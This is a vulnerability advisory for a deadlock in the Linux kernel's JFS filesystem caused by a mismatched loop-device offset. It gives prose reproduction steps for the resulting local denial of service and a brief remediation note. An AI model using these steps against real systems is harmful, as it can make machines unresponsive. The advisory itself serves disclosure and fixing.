Linux Kernel JFS Deadlock Vulnerability Due to Incorrect Nlink Value Handling

A deadlock vulnerability has been identified in the Linux kernel's JFS (Journaled File System) implementation. The issue arises when the 'ioctl$LOOP_SET_STATUS64' command is used with an offset value that does not correspond to the mounted loop device. This mismatch corrupts the mapping of the loop device, leading to the assignment of a nlink value of 0 to an inode. The incorrect nlink value is then copied to the inode allocation group (IAG) inode, causing a deadlock when the system attempts to free the inode. The vulnerability affects Linux kernel versions through 6.12.0-rc7.

Impact

Exploitation of this vulnerability leads to a deadlock condition, where the system becomes unresponsive due to circular locking dependencies.

Reproduction

The vulnerability can be reproduced by creating a loop device and mounting it. Then, issue the 'ioctl$LOOP_SET_STATUS64' command with an offset value of 4, which does not match the mounted loop device. This will invalidate the loop device mapping. Next, create a directory, which triggers the allocation of an inode in the JFS. The JFS will read the fixed disk inode in raw mode, but the metapage data returned will be corrupted, causing the nlink value of 0 to be assigned to the IAG inode. Finally, the deadlock occurs when the system tries to free the inode, as it is already holding locks that lead to a circular dependency.

Remediation

Users should ensure that the nlink value is checked before it is copied from the disk inode to the IAG inode to prevent this deadlock scenario.